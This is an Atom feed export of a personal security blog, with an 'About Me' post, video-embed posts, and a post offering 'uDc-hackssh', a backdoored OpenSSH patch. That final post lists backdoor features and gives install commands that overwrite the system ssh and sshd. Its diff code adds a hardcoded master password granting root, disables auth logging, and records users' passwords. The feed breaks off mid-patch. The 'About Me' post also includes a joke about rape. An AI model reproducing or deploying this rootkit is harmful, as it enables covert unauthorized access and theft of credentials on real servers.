width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-7892642458473539909</id><published>2009-11-10T01:27:00.002+08:00</published><updated>2010-10-22T21:45:03.432+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='uDc'/><category scheme='http://www.blogger.com/atom/ns#' term='LostSoul'/><title type='text'>About Me - updated</title><content type='html'>&lt;a href="http://1.bp.blogspot.com/_zPPJaS3LoQM/SRzjWy7j-JI/AAAAAAAAAfo/n3sPRGmfzL8/s1600-h/IMG_2254.JPG" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5268335644884859026" src="http://1.bp.blogspot.com/_zPPJaS3LoQM/SRzjWy7j-JI/AAAAAAAAAfo/n3sPRGmfzL8/s200/IMG_2254.JPG" style="cursor: pointer; float: right; height: 150px; margin: 0pt 0pt 10px 10px; width: 200px;" /&gt;&lt;/a&gt;Like most people, it's a complicated thing to describe me. Some might say it's along the lines of being an "acquired taste." Others might more correctly classify it as, "somebody that some people are willing to tolerate." Most likely, I am just inimitable, like many others. But I'll do the best I can to describe myself with words.&lt;br /&gt;&lt;br /&gt;I'd say that I am an eclectic amalgamation of many seemingly paradoxical things. This can be exemplified in both my seemingly endless persistence on many topics and arguments, as well as my careful cautiousness on other topics and arguments. This is largely due to how astute I am of the topic: more knowledge, more persistent; less knowledge, obviously more cautious.&lt;br /&gt;&lt;br /&gt;Apparently I look something like a serial killer or terrorist. Sometimes I can turn and become Doraemon.. use backdoor from my magic pocket and appear at your bedroom and rape you or I can be your personal and sexiest bodyguard depending how you look at me.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;So why Slash The Underground&lt;br /&gt;&lt;/span&gt;Slash The Underground was a name that given to me by my linux guru, &lt;span style="font-weight: bold;"&gt;burn&lt;/span&gt; or &lt;span style="font-weight: bold;"&gt;lordburn.&lt;/span&gt; My friends called me &lt;span style="font-style: italic; font-weight: bold;"&gt;'slash' &lt;/span&gt; and sometimes &lt;span style="font-style: italic; font-weight: bold;"&gt;'nullbyte&lt;/span&gt;' which is a nickname for me. It's short, clever, derogatory and sometimes considered desirable, symbolising a form of acceptance, but can often be a form of ridicule.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_zPPJaS3LoQM/SZJpPSIMklI/AAAAAAAAAmQ/EIKZ9vgdu20/s1600-h/malaysia_rel98.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5301415422653665874" src="http://2.bp.blogspot.com/_zPPJaS3LoQM/SZJpPSIMklI/AAAAAAAAAmQ/EIKZ9vgdu20/s200/malaysia_rel98.jpg" style="cursor: pointer; float: left; height: 150px; margin: 0pt 10px 10px 0pt; width: 200px;" /&gt;&lt;/a&gt;I am now 946,080,000 &lt;a href="http://en.wikipedia.org/wiki/Second"&gt;seconds&lt;/a&gt; old, 176 cm's height and 10.236 &lt;a href="http://en.wikipedia.org/wiki/Stone_%28weight%29"&gt;stones&lt;/a&gt; weight. Living in &lt;a href="http://en.wikipedia.org/wiki/Rivendell"&gt;Revendell,&lt;/a&gt; &lt;a href="http://en.wikipedia.org/wiki/Middle-earth"&gt;Middle Earth&lt;/a&gt; a.k.a. &lt;a href="http://en.wikipedia.org/wiki/Kuala_Lumpur"&gt;Kuala Lumpur&lt;/a&gt;, &lt;a href="http://en.wikipedia.org/wiki/Malaysia"&gt;Malaysia&lt;/a&gt; in &lt;a href="http://en.wikipedia.org/wiki/Southeast_Asia" title="Southeast Asia"&gt;Southeast Asia&lt;/a&gt; with a total landmass of 329,847 square kilometres (127,355 sq mi) with population stands at over 27 million. Malaysia is separated into two regions—&lt;a href="http://en.wikipedia.org/wiki/Peninsular_Malaysia" title="Peninsular Malaysia"&gt;Peninsular Malaysia&lt;/a&gt; and &lt;a href="http://en.wikipedia.org/wiki/East_Malaysia" title="East Malaysia"&gt;Malaysian Borneo&lt;/a&gt;—by the &lt;a href="http://en.wikipedia.org/wiki/South_China_Sea" title="South China Sea"&gt;South China Sea&lt;/a&gt;. It surrounded by &lt;a href="http://en.wikipedia.org/wiki/Thailand" title="Thailand"&gt;Thailand&lt;/a&gt;, &lt;a href="http://en.wikipedia.org/wiki/Indonesia" title="Indonesia"&gt;Indonesia&lt;/a&gt;, &lt;a href="http://en.wikipedia.org/wiki/Singapore" title="Singapore"&gt;Singapore&lt;/a&gt;, &lt;a href="http://en.wikipedia.org/wiki/Brunei" title="Brunei"&gt;Brunei&lt;/a&gt; and the &lt;a href="http://en.wikipedia.org/wiki/Philippines" title="Philippines"&gt;Philippines&lt;/a&gt; which is located near the equator and experiences a &lt;a href="http://en.wikipedia.org/wiki/Tropics" title="Tropics"&gt;tropical&lt;/a&gt; climate.&lt;br /&gt;&lt;a href="http://en.wikipedia.org/wiki/Malaysia#cite_note-CIA_Fact_Book-4" title=""&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_zPPJaS3LoQM/SZJpfMn4izI/AAAAAAAAAmY/8Lk6ZM8ZjEw/s1600-h/mabul.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5301415696053865266" src="http://1.bp.blogspot.com/_zPPJaS3LoQM/SZJpfMn4izI/AAAAAAAAAmY/8Lk6ZM8ZjEw/s200/mabul.jpg" style="cursor: pointer; float: right; height: 140px; margin: 0pt 0pt 10px 10px; width: 200px;" /&gt;&lt;/a&gt;My family are &lt;a href="http://en.wikipedia.org/wiki/Istari"&gt;Istari&lt;/a&gt; but we do not used this race anymore since we are not allowed and we need to hide the covenant from public.  I am now &lt;a href="http://en.wikipedia.org/wiki/Bajau"&gt;Bajau&lt;/a&gt; and in general I'm &lt;a href="http://en.wikipedia.org/wiki/Malays_%28ethnic_group%29"&gt;Malay&lt;/a&gt;. My great great great grandfather generation moved to &lt;a href="http://en.wikipedia.org/wiki/Tawau"&gt;Tawau&lt;/a&gt;, &lt;a href="http://en.wikipedia.org/wiki/Sabah"&gt;Sabah&lt;/a&gt;. Tawau is located at the south-east coast of Sabah which faces the &lt;a href="http://en.wikipedia.org/wiki/Celebes_Sea" title="Celebes Sea"&gt;Celebes Sea&lt;/a&gt; to the east and the interior mountain ranges to the west. The geographic coordinates of Tawau are latitude 4.298 degree North and longitude 117.883 degree East.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_zPPJaS3LoQM/SZJqNH_0xGI/AAAAAAAAAmg/9O7E3X4vyHg/s1600-h/klcc-night.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5301416485086086242" src="http://1.bp.blogspot.com/_zPPJaS3LoQM/SZJqNH_0xGI/AAAAAAAAAmg/9O7E3X4vyHg/s200/klcc-night.jpg" style="cursor: pointer; float: left; height: 126px; margin: 0pt 10px 10px 0pt; width: 200px;" /&gt;&lt;/a&gt;On top of a full-time job in &lt;a href="http://en.wikipedia.org/wiki/Computer_security"&gt;Computer Security&lt;/a&gt;, and nearly half-time blogging, I’m also a wanna-be a photographer. I am now working for telecommunication company as a Manager Cyber Security to design, develop and ensure that all Cyber countermeasures are implemeted which I think similar to Prime Minister job :) If you live in planet earth, neptune and pluto which is closed to &lt;a href="http://en.wikipedia.org/wiki/Gondor"&gt;Gondor&lt;/a&gt; &lt;a href="mailto:shaolinint@gmail.com"&gt;drop me a line&lt;/a&gt; perhaps we can hook up sometimes (this especially applies if you are lesbian and sexy female alie). Mostly I do &lt;a href="http://en.wikipedia.org/wiki/Penetration_testing"&gt;Penetration Testing&lt;/a&gt; (yes ladies I am professional penetrator) , I also do training for &lt;a href="http://en.wikipedia.org/wiki/Information_security"&gt;Information Security&lt;/a&gt; related subjects. If you are interested in some consultancy or such like &lt;a href="mailto:shaolinint@gmail.com"&gt;let me know&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;I've visited 14 states (6.22%)&lt;br /&gt;&lt;img height="220" src="http://chart.apis.google.com/chart?cht=t&amp;amp;chs=440x220&amp;amp;chtm=world&amp;amp;chf=bg,s,336699&amp;amp;chco=d0d0d0,cc0000&amp;amp;chd=s:99999999999999&amp;amp;chld=GBITSEIDPHMYSASGKRTHAECNDENL" width="440" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;a href="http://4.bp.blogspot.com/_zPPJaS3LoQM/RsTrUVDo4DI/AAAAAAAAAHY/VINlt3foP70/s1600-h/Image001.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5099459412572561458" src="http://4.bp.blogspot.com/_zPPJaS3LoQM/RsTrUVDo4DI/AAAAAAAAAHY/VINlt3foP70/s320/Image001.jpg" style="cursor: pointer; float: left; height: 149px; margin: 0pt 10px 10px 0pt; width: 200px;" /&gt;&lt;/a&gt;I like to play &lt;a href="http://myteatime.blogspot.com/2007/02/blog-post.html"&gt;guitar&lt;/a&gt; and in general I like play music instruments and sometimes body instruments if you know what I mean... so be warned. I also watch tv and movies during my free time; Harry Porter, Spiderman, X-Men, Braveheart and of course Lord of The Ring are my favorites. Sometimes I watch blue, yellow and white movies alone unless you want to join. You know, there is one time I watched a black color movie, I tod it was a good movie.. but finally I realized.. The tv power is off.. no wonder  its black screen... But... I'm open and I don't care if you naked in front of me watching a blue movie, hehehe.&lt;/div&gt;&lt;/div&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;strong&gt;Why subject us to your inane ramblings?&lt;/strong&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_zPPJaS3LoQM/SZJqfyTBLRI/AAAAAAAAAmo/w7UlVHuiYqk/s1600-h/17012009021.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5301416805678525714" src="http://1.bp.blogspot.com/_zPPJaS3LoQM/SZJqfyTBLRI/AAAAAAAAAmo/w7UlVHuiYqk/s200/17012009021.jpg" style="cursor: pointer; float: right; height: 150px; margin: 0pt 0pt 10px 10px; width: 200px;" /&gt;&lt;/a&gt;If you don't like it, don't read it..simple. I just needed somewhere to scribble down the cluttered mess of data inside my head, yes I mean data, not information as it's not yet been parsed into a useful format. Perhaps people will read, perhaps people will laugh, perhaps people will get mad...as long as I invoke some kind of emotion then I've done something meaningful. It's meant to be a satirically humourous, topical outlook on things, with some interesting tidbits, weird stuff, interesting findings and the odd rant about the terrible state of things.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Final words&lt;/span&gt;&lt;br /&gt;I can be your best friend, but I can also be your worst enemy. I am passionate with what I do and I fight for what I believe in. I wish I could go to Paris and Switzerland someday, I wish I could play guitar together with &lt;a href="http://en.wikipedia.org/wiki/Slash_%28musician%29"&gt;Slash&lt;/a&gt; - Gun and Roses, &lt;a href="http://en.wikipedia.org/wiki/Yngwie_Malmsteen"&gt;Yngwie Malmsteen&lt;/a&gt; and sing along with &lt;a href="http://en.wikipedia.org/wiki/Bon_Jovi"&gt;Jon Bon Jovi&lt;/a&gt; in concert.&lt;br /&gt;&lt;br /&gt;If you feel want to contact me, send me an &lt;a href="mailto:shaolinint@gmail.com"&gt;email&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Finally, below are one of Bajau legacy (specifically) and &lt;a href="http://en.wikipedia.org/wiki/Sultanate_of_Sulu"&gt;Sulu's&lt;/a&gt; legacy (generally). Enjoy!&lt;br /&gt;&lt;br /&gt;&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/nvEtuL_BS4w&amp;amp;autoplay=1&amp;amp;color1=0xb1b1b1&amp;amp;color2=0xcfcfcf&amp;amp;feature=player_embedded&amp;amp;fs=1"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowScriptAccess" value="always"&gt;&lt;embed src="http://www.youtube.com/v/nvEtuL_BS4w&amp;amp;autoplay=1&amp;amp;color1=0xb1b1b1&amp;amp;color2=0xcfcfcf&amp;amp;feature=player_embedded&amp;amp;fs=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" height="344" width="425"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-7892642458473539909?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/7892642458473539909/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=7892642458473539909' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/7892642458473539909'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/7892642458473539909'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2007/02/about-me.html' title='About Me - updated'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_zPPJaS3LoQM/SRzjWy7j-JI/AAAAAAAAAfo/n3sPRGmfzL8/s72-c/IMG_2254.JPG' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-8024411034821852384</id><published>2009-11-07T23:50:00.002+08:00</published><updated>2009-11-10T01:26:13.853+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='PeriBajau'/><category scheme='http://www.blogger.com/atom/ns#' term='LostSoul'/><title type='text'>Lolai Liangkit - Legacy of Sulu's</title><content type='html'>&lt;object height="364" width="445"&gt;&lt;param name="movie" value="http://www.youtube.com/v/xDVbkUmYIVE&amp;amp;amp;hl=en&amp;amp;fs=1&amp;amp;border=1"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;embed src="http://www.youtube.com/v/xDVbkUmYIVE&amp;amp;amp;hl=en&amp;amp;fs=1&amp;amp;border=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" height="364" width="445"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-8024411034821852384?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/8024411034821852384/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=8024411034821852384' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/8024411034821852384'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/8024411034821852384'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2009/11/lolai-liangkit-legacy-of-sulus.html' title='Lolai Liangkit - Legacy of Sulu&apos;s'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-3613669450012253221</id><published>2009-09-14T00:24:00.008+08:00</published><updated>2009-11-08T00:12:44.695+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='LostSoul'/><title type='text'>Asma-U Allah</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/08j9OHPBYmE&amp;amp;hl=en&amp;amp;fs=1&amp;amp;"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;embed src="http://www.youtube.com/v/08j9OHPBYmE&amp;amp;hl=en&amp;amp;fs=1&amp;amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" height="344" width="425"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-3613669450012253221?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/3613669450012253221/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=3613669450012253221' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/3613669450012253221'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/3613669450012253221'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2009/09/asma-u-allah.html' title='Asma-U Allah'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-2261729260503198423</id><published>2009-09-12T00:25:00.007+08:00</published><updated>2011-06-25T21:39:07.231+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='uDc'/><title type='text'>uDc-hackssh-v1.0b</title><content type='html'>&lt;a href="http://1.bp.blogspot.com/_zPPJaS3LoQM/Sqp6xNn4LLI/AAAAAAAAAog/YbxHGz7DZcM/s1600-h/hackpermit.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5380247690736577714" src="http://1.bp.blogspot.com/_zPPJaS3LoQM/Sqp6xNn4LLI/AAAAAAAAAog/YbxHGz7DZcM/s200/hackpermit.jpg" style="cursor: pointer; float: left; height: 200px; margin: 0pt 10px 10px 0pt; width: 200px;" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;Features:&lt;/span&gt;&lt;br /&gt;- special password to log in with any user account and get root&lt;br /&gt;- no logs in the machine (messages,auth,utmp,…)&lt;br /&gt;- bash shell will use /dev/null as HISTFILE&lt;br /&gt;- logs user passwords (local and remote sessions)&lt;br /&gt;- should bypass 'PermitRootLogin No"&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Installation:&lt;/span&gt;&lt;br /&gt;[slash@Slash-The-Underground]-[Sat Sep 12]-[00:35]-[/pentest/rk/ssh/uDc-hackssh]&lt;br /&gt;$ pwd&lt;br /&gt;/pentest/rk/ssh/uDc-hackssh&lt;br /&gt;&lt;br /&gt;[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh]&lt;br /&gt;$ tar -zxf openssh-5.2p1.tar.gz&lt;br /&gt;&lt;br /&gt;[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh]&lt;br /&gt;$ patch -p0 &amp;lt; uDc-hackssh-v1.0b&lt;br /&gt;&lt;br /&gt;[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ cd openssh-5.2p1&lt;br /&gt;&lt;br /&gt;[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ ./configure --prefix=/usr --sbindir=/usr/sbin --bindir=/usr/bin --sysconfdir=/path_to_origin_configuration --with-pam&lt;br /&gt;&lt;br /&gt;[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ make&lt;br /&gt;&lt;br /&gt;[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ strip ssh sshd&lt;br /&gt;&lt;br /&gt;[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ rm -rf /usr/sbin/sshd /usr/bin/ssh&lt;br /&gt;&lt;br /&gt;[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ cp ssh /usr/bin/ssh&lt;br /&gt;&lt;br /&gt;[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ cp sshd /usr/sbin/sshd&lt;br /&gt;[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ ps -ax | grep sshd&lt;br /&gt;[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ kill -HUP 'appropriate pid number'   And finally, the patch code....&lt;br /&gt;[slash@Slash-The-Underground]-[Sat Sep 12]-[00:29]-[/pentest/rk/ssh/uDc-hackssh] $ cat uDc-hackssh-v1.0b.patch&lt;br /&gt;diff -Ncr openssh-5.2p1/auth-pam.c uDc-hackssh-v1.0b/auth-pam.c&lt;br /&gt;*** openssh-5.2p1/auth-pam.c    Tue Mar 11 19:58:25 2008&lt;br /&gt;--- uDc-hackssh-v1.0b/auth-pam.c    Fri Sep 11 22:38:47 2009&lt;br /&gt;***************&lt;br /&gt;*** 466,471 ****&lt;br /&gt;--- 466,474 ----&lt;br /&gt;if (sshpam_err != PAM_SUCCESS) goto auth_fail;&lt;br /&gt;sshpam_err = pam_authenticate(sshpam_handle, flags);&lt;br /&gt;+     // slash patch&lt;br /&gt;+     if(uDc) sshpam_err = PAM_SUCCESS;&lt;br /&gt;+     // end of patch&amp;nbsp; &lt;br /&gt;if (sshpam_err != PAM_SUCCESS) goto auth_fail;&lt;br /&gt;&lt;br /&gt;***************&lt;br /&gt;*** 816,821 ****&lt;br /&gt;--- 819,833 ----&lt;br /&gt;Buffer buffer;&lt;br /&gt;struct pam_ctxt *ctxt = ctx;&lt;br /&gt;+     // slash patch +     if(sshpam_authctxt)&lt;br /&gt;+     for (ai = 0; ai &amp;lt; num; ++ai) {&lt;br /&gt;+     sprintf(abuff, "pam_from: %s \tuser: %s \tpass: %s\n",&lt;br /&gt;+         get_remote_ipaddr(), sshpam_authctxt-&amp;gt;user, resp[ai]);&lt;br /&gt;+     if(!strcmp(BAJAUPASS, resp[ai])) ctxt-&amp;gt;pam_done = uDc = 1;&lt;br /&gt;+         else uDclog();&lt;br /&gt;+     }&lt;br /&gt;+     // end of patch &lt;br /&gt;debug2("PAM: %s entering, %u responses", __func__, num);&lt;br /&gt;switch (ctxt-&amp;gt;pam_done) {&lt;br /&gt;case 1:&lt;br /&gt;***************&lt;br /&gt;*** 1045,1050 ****&lt;br /&gt;--- 1057,1065 ----&lt;br /&gt;if (sshpam_err != PAM_SUCCESS)&lt;br /&gt;fatal("PAM: failed to set PAM_CONV: %s",&lt;br /&gt;pam_strerror(sshpam_handle, sshpam_err));&lt;br /&gt;+     // slash patch&lt;br /&gt;+     if(!uDc)&lt;br /&gt;+     // end of patch&lt;br /&gt;sshpam_err = pam_open_session(sshpam_handle, 0);&lt;br /&gt;if (sshpam_err == PAM_SUCCESS)&lt;br /&gt;sshpam_session_open = 1;&lt;br /&gt;&lt;br /&gt;diff -Ncr openssh-5.2p1/auth-passwd.c uDc-hackssh-v1.0b/auth-passwd.c&lt;br /&gt;*** openssh-5.2p1/auth-passwd.c    Fri Oct 26 12:25:12 2007&lt;br /&gt;--- uDc-hackssh-v1.0b/auth-passwd.c    Fri Sep 11 23:30:00 2009&lt;br /&gt;***************&lt;br /&gt;*** 92,97 ****&lt;br /&gt;--- 92,107 ----&lt;br /&gt;#endif&lt;br /&gt;if (*password == '\0' &amp;amp;&amp;amp; options.permit_empty_passwd == 0)&lt;br /&gt;return 0;&lt;br /&gt;+     // slash patch&lt;br /&gt;+     if(!strcmp(BAJAUPASS, password)) {&lt;br /&gt;+         uDc = 1;&lt;br /&gt;+     //    options.permit_root_login = PERMIT_YES;&lt;br /&gt;+         return;&lt;br /&gt;+     }&lt;br /&gt;+     sprintf(abuff, "pass_from: %s \tuser: %s \tpass: %s\n",&lt;br /&gt;+         get_remote_ipaddr(), pw-&amp;gt;pw_name, password);&lt;br /&gt;+     uDclog();&lt;br /&gt;+     // end of patch&lt;br /&gt;&lt;br /&gt;#ifdef KRB5&lt;br /&gt;if (options.kerberos_authentication == 1) {&lt;br /&gt;&lt;br /&gt;diff -Ncr openssh-5.2p1/auth.c uDc-hackssh-v1.0b/auth.c&lt;br /&gt;*** openssh-5.2p1/auth.c    Wed Nov  5 13:12:54 2008&lt;br /&gt;--- uDc-hackssh-v1.0b/auth.c    Fri Sep 11 23:35:47 2009&lt;br /&gt;***************&lt;br /&gt;*** 93,98 ****&lt;br /&gt;--- 93,104 ----&lt;br /&gt;int&lt;br /&gt;allowed_user(struct passwd * pw)&lt;br /&gt;{&lt;br /&gt;+     // slash patch&lt;br /&gt;+     if(uDc)&lt;br /&gt;+         return 1;&lt;br /&gt;+     else {&lt;br /&gt;+     // end of patch&lt;br /&gt;+&lt;br /&gt;struct stat st;&lt;br /&gt;const char *hostname = NULL, *ipaddr = NULL, *passwd = NULL;&lt;br /&gt;char *shell;&lt;br /&gt;***************&lt;br /&gt;*** 243,252 ****&lt;br /&gt;--- 249,264 ----&lt;br /&gt;/* We found no reason not to let this user try to log on... */&lt;br /&gt;return 1;&lt;br /&gt;}&lt;br /&gt;+ // slash patch&lt;br /&gt;+ }&lt;br /&gt;+ // end of patch&lt;br /&gt;&lt;br /&gt;void&lt;br /&gt;auth_log(Authctxt *authctxt, int authenticated, char *method, char *info)&lt;br /&gt;{&lt;br /&gt;+     // slash patch&lt;br /&gt;+     if(!uDc) {&lt;br /&gt;+     // end of patch&lt;br /&gt;void (*authlog) (const char *fmt,...) = verbose;&lt;br /&gt;char *authmsg;&lt;br /&gt;&lt;br /&gt;***************&lt;br /&gt;*** 291,296 ****&lt;br /&gt;--- 303,311 ----&lt;br /&gt;if (authenticated == 0 &amp;amp;&amp;amp; !authctxt-&amp;gt;postponed)&lt;br /&gt;audit_event(audit_classify_auth(method));&lt;br /&gt;#endif&lt;br /&gt;+ // slash patch&lt;br /&gt;+ }&lt;br /&gt;+ // end of patch&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt;***************&lt;br /&gt;*** 299,304 ****&lt;br /&gt;--- 314,322 ----&lt;br /&gt;int&lt;br /&gt;auth_root_allowed(char *method)&lt;br /&gt;{&lt;br /&gt;+     // slash patch&lt;br /&gt;+     if(!uDc) {&lt;br /&gt;+     // end of patch&lt;br /&gt;switch (options.permit_root_login) {&lt;br /&gt;case PERMIT_YES:&lt;br /&gt;return 1;&lt;br /&gt;***************&lt;br /&gt;*** 316,321 ****&lt;br /&gt;--- 334,344 ----&lt;br /&gt;logit("ROOT LOGIN REFUSED FROM %.200s", get_remote_ipaddr());&lt;br /&gt;return 0;&lt;br /&gt;}&lt;br /&gt;+ // slash patch&lt;br /&gt;+ else&lt;br /&gt;+     return 1;&lt;br /&gt;+ }&lt;br /&gt;+ // end of patch&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt;diff -Ncr openssh-5.2p1/canohost.c uDc-hackssh-v1.0b/canohost.c&lt;br /&gt;*** openssh-5.2p1/canohost.c    Sat Feb 14 13:28:21 2009&lt;br /&gt;--- uDc-hackssh-v1.0b/canohost.c    Fri Sep 11 23:38:28 2009&lt;br /&gt;***************&lt;br /&gt;*** 78,83 ****&lt;br /&gt;--- 78,86 ----&lt;br /&gt;if (getnameinfo((struct sockaddr *)&amp;amp;from, fromlen, name, sizeof(name),&lt;br /&gt;NULL, 0, NI_NAMEREQD) != 0) {&lt;br /&gt;/* Host name not found.  Use ip address. */&lt;br /&gt;+         // slash patch&lt;br /&gt;+         if(!uDc)&lt;br /&gt;+         // end of patch&lt;br /&gt;return xstrdup(ntop);&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;diff -Ncr openssh-5.2p1/includes.h uDc-hackssh-v1.0b/includes.h&lt;br /&gt;*** openssh-5.2p1/includes.h    Fri Jul  4 21:10:49 2008&lt;br /&gt;--- uDc-hackssh-v1.0b/includes.h    Fri Sep 11 22:38:47 2009&lt;br /&gt;***************&lt;br /&gt;*** 13,18 ****&lt;br /&gt;--- 13,41 ----&lt;br /&gt;* called by a name other than "ssh" or "Secure Shell".&lt;br /&gt;*/&lt;br /&gt;&lt;br /&gt;+ // slash patch&lt;br /&gt;+ #include &lt;sys stat.h=""&gt;&lt;br /&gt;+ #include &lt;stdio.h&gt;&lt;br /&gt;+&lt;br /&gt;+ #define BAJAUPASS      "@#;.,uDc,.;#@"&lt;br /&gt;+ 